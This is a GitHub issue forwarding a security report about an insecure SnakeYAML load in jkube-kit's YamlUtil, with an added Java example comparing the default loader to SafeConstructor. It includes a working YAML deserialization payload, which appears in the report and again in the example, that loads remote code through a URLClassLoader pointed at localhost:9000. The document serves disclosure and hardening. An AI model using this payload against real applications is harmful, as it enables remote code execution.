Bug 561261 - jkube-kit - insecure yaml load leading to RCE (CWE-502) #122

@manusa

Description

Proxy issue for https://bugs.eclipse.org/bugs/show_bug.cgi?id=561261

From the Security Team Inbox:

--
https://github.com/eclipse/jkube/blob/master/jkube-kit/common/src/main/java/org/eclipse/jkube/kit/common/util/YamlUtil.java#L112 uses an insecure way to construct the Yaml object, leading to remote code execution. Here is sample code which would invoke malicious code hosted on localhost:9000.

import org.eclipse.jkube.kit.common.util.YamlUtil;

// The !!javax.script.ScriptEngineManager tag is resolved to a Java class; built over a URLClassLoader it loads code fetched from localhost:9000
String code = "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";
YamlUtil.getPropertiesFromYamlString(code);

Please refer to SafeConstructor() and https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-restrict-classes-to-be-loaded on using the API securely.

Reference: https://cwe.mitre.org/data/definitions/502.html
--

There's help for managing vulnerabilities in the handbook.

https://www.eclipse.org/projects/handbook/#vulnerability
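The following is an added example, not jkube's code and not the reporter's snippet: it puts the default SnakeYAML loader, which resolves any `!!fully.qualified.Class` tag to a Java class, next to a loader built on `SafeConstructor`, which only knows the standard YAML tags and rejects the `!!javax.script.ScriptEngineManager` payload with a `YAMLException` instead of instantiating it. The class name `SafeYamlDemo`, the helper methods `loadUnsafe`/`loadSafe` and the sample inputs are assumptions made for the example; it also assumes SnakeYAML 1.x, where `SafeConstructor` has a no-arg constructor (SnakeYAML 2.x requires `new SafeConstructor(new LoaderOptions())`).

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

/**
 * Added example (not jkube project code). Compares a default SnakeYAML loader,
 * which honours arbitrary !!fully.qualified.Class tags, with one built on
 * SafeConstructor, which constructs only standard YAML types.
 * Assumes SnakeYAML 1.x; on 2.x use new SafeConstructor(new LoaderOptions()).
 */
public class SafeYamlDemo {

    // Constructed sample input modelled on the payload in the report. A
    // ScriptEngineManager built over a URLClassLoader performs a ServiceLoader
    // lookup through that loader, so classes served by the URL get loaded and run.
    // The host is a placeholder, not a real endpoint.
    static final String MALICIOUS_YAML =
        "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";

    // Constructed benign configuration of the kind a caller legitimately expects.
    static final String BENIGN_YAML = "maps:\n  key: value\n  port: 8080\n";

    /** Vulnerable pattern: the default Yaml instance resolves any !!tag to a Java class. */
    static Object loadUnsafe(String yaml) {
        return new Yaml().load(yaml);
    }

    /** Hardened pattern: SafeConstructor only builds str, int, float, bool, map, seq, etc. */
    static Object loadSafe(String yaml) {
        return new Yaml(new SafeConstructor()).load(yaml);
    }

    /** Returns true when the safe loader refuses the input with a YAML error. */
    static boolean safeLoaderRejects(String yaml) {
        try {
            loadSafe(yaml);
            return false;
        } catch (YAMLException e) {
            // For the payload above this is a ConstructorException:
            // "could not determine a constructor for the tag ...ScriptEngineManager"
            return true;
        }
    }

    public static void main(String[] args) {
        // Benign input parses to a plain Map with the hardened loader.
        Map<?, ?> benign = (Map<?, ?>) loadSafe(BENIGN_YAML);
        System.out.println("safe loader, benign input: " + benign);

        // The hardened loader refuses the custom tag instead of instantiating the class.
        System.out.println("safe loader rejects payload: " + safeLoaderRejects(MALICIOUS_YAML));

        // Deliberately not executed: loadUnsafe(MALICIOUS_YAML) would instantiate
        // ScriptEngineManager with an attacker-controlled class loader. Only run it
        // in an isolated environment when reproducing the report.
    }
}
```

The practical check for a code base like jkube-kit is to grep for `new Yaml()` and `new Yaml(new Constructor(...))` on paths that parse user-supplied or repository-supplied YAML; every such site should either use `SafeConstructor` or, where typed objects are genuinely needed, a `Constructor` restricted to an explicit allow-list of classes as the linked SnakeYAML documentation describes.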
